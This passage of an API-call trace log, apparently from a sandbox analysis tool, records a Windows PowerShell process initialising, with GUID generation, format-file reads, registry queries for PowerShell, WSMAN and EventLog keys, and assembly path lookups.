Data4=([0]=0x8c, [1]=0x52, [2]=0x72, [3]=0xe6, [4]=0xb2, [5]=0xdd, [6]=0x3f, [7]=0xa2))) returned 0x0 [0152.333] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x4acc89f0, Data2=0x3cab, Data3=0x4bdc, Data4=([0]=0x8f, [1]=0x2a, [2]=0xbb, [3]=0x1b, [4]=0x31, [5]=0x36, [6]=0xfb, [7]=0x62))) returned 0x0 [0152.333] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xb566aa67, Data2=0x64cc, Data3=0x402c, Data4=([0]=0xa5, [1]=0x57, [2]=0x6e, [3]=0x18, [4]=0x9f, [5]=0xc5, [6]=0xfa, [7]=0x64))) returned 0x0 [0152.333] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x63a7c845, Data2=0xf971, Data3=0x4b7b, Data4=([0]=0xbf, [1]=0xcc, [2]=0xf5, [3]=0xc7, [4]=0xee, [5]=0xd7, [6]=0x4, [7]=0x58))) returned 0x0 [0152.333] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x5cfe071c, Data2=0xc50c, Data3=0x4ea8, Data4=([0]=0xaf, [1]=0x23, [2]=0xb, [3]=0xb5, [4]=0x1b, [5]=0x7c, [6]=0xcd, [7]=0x8a))) returned 0x0 [0152.333] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x6997a07, Data2=0x2692, Data3=0x4782, Data4=([0]=0x87, [1]=0xfb, [2]=0x55, [3]=0x81, [4]=0x11, [5]=0x47, [6]=0x8e, [7]=0x9c))) returned 0x0 [0152.334] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x71f977d, Data2=0xa75e, Data3=0x4bb8, Data4=([0]=0xab, [1]=0xa6, [2]=0x67, [3]=0x47, [4]=0x6d, [5]=0x15, [6]=0x77, [7]=0xb8))) returned 0x0 [0152.334] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xe23fdaa4, Data2=0xf654, Data3=0x47e7, Data4=([0]=0xa7, [1]=0x9, [2]=0x30, [3]=0xed, [4]=0xe, [5]=0xcc, [6]=0xaa, [7]=0x99))) returned 0x0 [0152.334] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xe2c427c6, Data2=0xf4d5, Data3=0x494f, Data4=([0]=0x99, [1]=0xa7, [2]=0xb6, [3]=0x1f, [4]=0x3d, [5]=0x95, [6]=0x22, [7]=0xef))) returned 0x0 [0152.334] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xb395e3b5, Data2=0x9667, Data3=0x4260, Data4=([0]=0x8a, [1]=0x32, [2]=0x90, [3]=0x4, [4]=0x43, [5]=0xfc, [6]=0x1f, [7]=0xd1))) returned 0x0 [0152.334] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xd2292d8d, Data2=0x85c6, Data3=0x48ee, Data4=([0]=0x80, [1]=0xd6, [2]=0x31, [3]=0xd6, [4]=0xd9, [5]=0xbc, [6]=0x8a, [7]=0xf))) returned 0x0 [0152.334] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x414391e, Data2=0x2043, Data3=0x4699, Data4=([0]=0xa9, [1]=0xc2, [2]=0x54, [3]=0xff, [4]=0xa7, [5]=0xee, [6]=0x1a, [7]=0x9))) returned 0x0 [0152.334] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x5b9e5d91, Data2=0xffa8, Data3=0x4740, Data4=([0]=0x82, [1]=0x3e, [2]=0x96, [3]=0xd0, [4]=0xef, [5]=0x7f, [6]=0x7b, [7]=0x43))) returned 0x0 [0152.335] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x660a47ba, Data2=0x438e, Data3=0x4f03, Data4=([0]=0xba, [1]=0x75, [2]=0xd0, [3]=0xd6, [4]=0x96, [5]=0xf3, [6]=0xd0, [7]=0xb0))) returned 0x0 [0152.335] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x5671d2ef, Data2=0x879c, Data3=0x4c84, Data4=([0]=0xaf, [1]=0x8c, [2]=0x5, [3]=0xd5, [4]=0xb4, [5]=0x50, [6]=0x97, [7]=0xcd))) returned 0x0 [0152.335] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x6e01049, Data2=0xc9c8, Data3=0x488c, Data4=([0]=0x8c, [1]=0x67, [2]=0x25, [3]=0x7f, [4]=0x5e, [5]=0xfb, [6]=0x13, [7]=0xc1))) returned 0x0 [0152.335] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0152.336] GetLastError () returned 0x0 [0152.336] GetFileType (hFile=0x34c) returned 0x1 [0152.336] SetErrorMode (uMode=0x1) returned 0x1 [0152.336] GetFileType (hFile=0x34c) returned 0x1 [0152.336] ReadFile (in: hFile=0x34c, lpBuffer=0x3148ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3148ae0*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.336] GetLastError () returned 0x0 [0152.336] ReadFile (in: hFile=0x34c, lpBuffer=0x3148ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3148ae0*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.336] GetLastError () returned 0x0 [0152.336] ReadFile (in: hFile=0x34c, lpBuffer=0x3148ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3148ae0*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.336] GetLastError () returned 0x0 [0152.336] ReadFile (in: hFile=0x34c, lpBuffer=0x3148ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3148ae0*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.337] GetLastError () returned 0x0 [0152.337] ReadFile (in: hFile=0x34c, lpBuffer=0x3148ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3148ae0*, lpNumberOfBytesRead=0x23e544*=0x8b4, lpOverlapped=0x0) returned 1 [0152.337] GetLastError () returned 0x0 [0152.337] ReadFile (in: hFile=0x34c, lpBuffer=0x3147f34, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3147f34*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.337] GetLastError () returned 0x0 [0152.337] ReadFile (in: hFile=0x34c, lpBuffer=0x3148ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3148ae0*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.337] GetLastError () returned 0x0 [0152.338] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e4c8 | out: phkResult=0x23e4c8*=0x34c) returned 0x0 [0152.338] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x0, lpcbData=0x23e50c*=0x0 | out: lpType=0x23e510*=0x1, lpData=0x0, lpcbData=0x23e50c*=0x56) returned 0x0 [0152.338] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x357e88, lpcbData=0x23e50c*=0x56 | out: lpType=0x23e510*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e50c*=0x56) returned 0x0 [0152.338] RegCloseKey (hKey=0x34c) returned 0x0 [0152.338] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xfef22234, Data2=0x3d17, Data3=0x4587, Data4=([0]=0xb0, [1]=0x83, [2]=0x83, [3]=0x44, [4]=0x2b, [5]=0x67, [6]=0x2, [7]=0x79))) returned 0x0 [0152.338] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xfeb51eb1, Data2=0x2da1, Data3=0x4566, Data4=([0]=0x80, [1]=0x1d, [2]=0xec, [3]=0xcc, [4]=0x26, [5]=0xae, [6]=0x1, [7]=0x90))) returned 0x0 [0152.339] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0152.339] GetLastError () returned 0x0 [0152.339] GetFileType (hFile=0x34c) returned 0x1 [0152.339] SetErrorMode (uMode=0x1) returned 0x1 [0152.339] GetFileType (hFile=0x34c) returned 0x1 [0152.339] ReadFile (in: hFile=0x34c, lpBuffer=0x317f9ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x317f9ec*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.347] GetLastError () returned 0x0 [0152.348] ReadFile (in: hFile=0x34c, lpBuffer=0x317f9ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x317f9ec*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.348] GetLastError () returned 0x0 [0152.348] ReadFile (in: hFile=0x34c, lpBuffer=0x317f9ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x317f9ec*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.348] GetLastError () returned 0x0 [0152.348] ReadFile (in: hFile=0x34c, lpBuffer=0x317f9ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x317f9ec*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.348] GetLastError () returned 0x0 [0152.348] ReadFile (in: hFile=0x34c, lpBuffer=0x317f9ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x317f9ec*, lpNumberOfBytesRead=0x23e544*=0xe98, lpOverlapped=0x0) returned 1 [0152.348] GetLastError () returned 0x0 [0152.348] ReadFile (in: hFile=0x34c, lpBuffer=0x317f024, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x317f024*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.349] GetLastError () returned 0x0 [0152.349] ReadFile (in: hFile=0x34c, lpBuffer=0x317f9ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x317f9ec*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.349] GetLastError () returned 0x0 [0152.350] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e4c8 | out: phkResult=0x23e4c8*=0x34c) returned 0x0 [0152.350] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x0, lpcbData=0x23e50c*=0x0 | out: lpType=0x23e510*=0x1, lpData=0x0, lpcbData=0x23e50c*=0x56) returned 0x0 [0152.350] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x357e88, lpcbData=0x23e50c*=0x56 | out: lpType=0x23e510*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e50c*=0x56) returned 0x0 [0152.350] RegCloseKey (hKey=0x34c) returned 0x0 [0152.351] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x42898d19, Data2=0xb7ed, Data3=0x4d66, Data4=([0]=0xb4, [1]=0xa5, [2]=0x16, [3]=0xaf, [4]=0x6d, [5]=0x11, [6]=0x72, [7]=0xe0))) returned 0x0 [0152.351] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xf9ddda71, Data2=0xb1c2, Data3=0x4d4e, Data4=([0]=0x89, [1]=0x2, [2]=0xd5, [3]=0x6b, [4]=0x29, [5]=0x4a, [6]=0x49, [7]=0xc6))) returned 0x0 [0152.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0152.363] GetLastError () returned 0x57 [0152.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0152.363] GetLastError () returned 0x57 [0152.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0152.418] GetLastError () returned 0x57 [0152.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0152.418] GetLastError () returned 0x57 [0152.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.425] GetLastError () returned 0x57 [0152.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.425] GetLastError () returned 0x57 [0152.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0152.427] GetLastError () returned 0x57 [0152.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0152.428] GetLastError () returned 0x57 [0152.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0152.430] GetLastError () returned 0x57 [0152.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0152.430] GetLastError () returned 0x57 [0152.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0152.432] GetLastError () returned 0x57 [0152.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0152.432] GetLastError () returned 0x57 [0152.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0152.434] GetLastError () returned 0x57 [0152.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x23e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0152.434] GetLastError () returned 0x57 [0152.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.439] GetLastError () returned 0xcb [0152.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.446] GetLastError () returned 0xcb [0152.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.448] GetLastError () returned 0xcb [0152.510] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e5bc | out: phkResult=0x23e5bc*=0x34c) returned 0x0 [0152.512] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x23e60c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e610, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x23e60c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e610*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0152.513] RegEnumValueW (in: hKey=0x34c, dwIndex=0x0, lpValueName=0x357e88, lpcchValueName=0x23e634, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x23e634, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0152.513] RegEnumValueW (in: hKey=0x34c, dwIndex=0x1, lpValueName=0x357e88, lpcchValueName=0x23e634, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x23e634, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0152.514] RegQueryValueExW (in: hKey=0x34c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x23e614, lpData=0x0, lpcbData=0x23e610*=0x0 | out: lpType=0x23e614*=0x1, lpData=0x0, lpcbData=0x23e610*=0x8) returned 0x0 [0152.514] RegQueryValueExW (in: hKey=0x34c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x23e614, lpData=0x357e88, lpcbData=0x23e610*=0x8 | out: lpType=0x23e614*=0x1, lpData="2.0", lpcbData=0x23e610*=0x8) returned 0x0 [0152.601] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e578 | out: phkResult=0x23e578*=0x31c) returned 0x0 [0152.601] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x23e5c8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e5cc, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x23e5c8*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e5cc*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0152.601] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x357e88, lpcchValueName=0x23e5f0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x23e5f0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0152.601] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x357e88, lpcchValueName=0x23e5f0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x23e5f0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0152.602] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x23e5d0, lpData=0x0, lpcbData=0x23e5cc*=0x0 | out: lpType=0x23e5d0*=0x1, lpData=0x0, lpcbData=0x23e5cc*=0x8) returned 0x0 [0152.602] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x23e5d0, lpData=0x357e88, lpcbData=0x23e5cc*=0x8 | out: lpType=0x23e5d0*=0x1, lpData="2.0", lpcbData=0x23e5cc*=0x8) returned 0x0 [0152.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.603] GetLastError () returned 0xcb [0152.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0152.606] GetLastError () returned 0xcb [0153.046] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e538 | out: phkResult=0x23e538*=0x320) returned 0x0 [0153.047] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x23e5a0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e59c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x23e5a0*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e59c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.047] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x357e88, lpcchName=0x23e5bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x23e5bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.048] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x357e88, lpcchName=0x23e5bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x23e5bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.048] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x357e88, lpcchName=0x23e5bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x23e5bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.048] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x357e88, lpcchName=0x23e5bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x23e5bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.048] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x357e88, lpcchName=0x23e5bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x23e5bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.048] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x357e88, lpcchName=0x23e5bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x23e5bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.048] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x357e88, lpcchName=0x23e5bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x23e5bc, 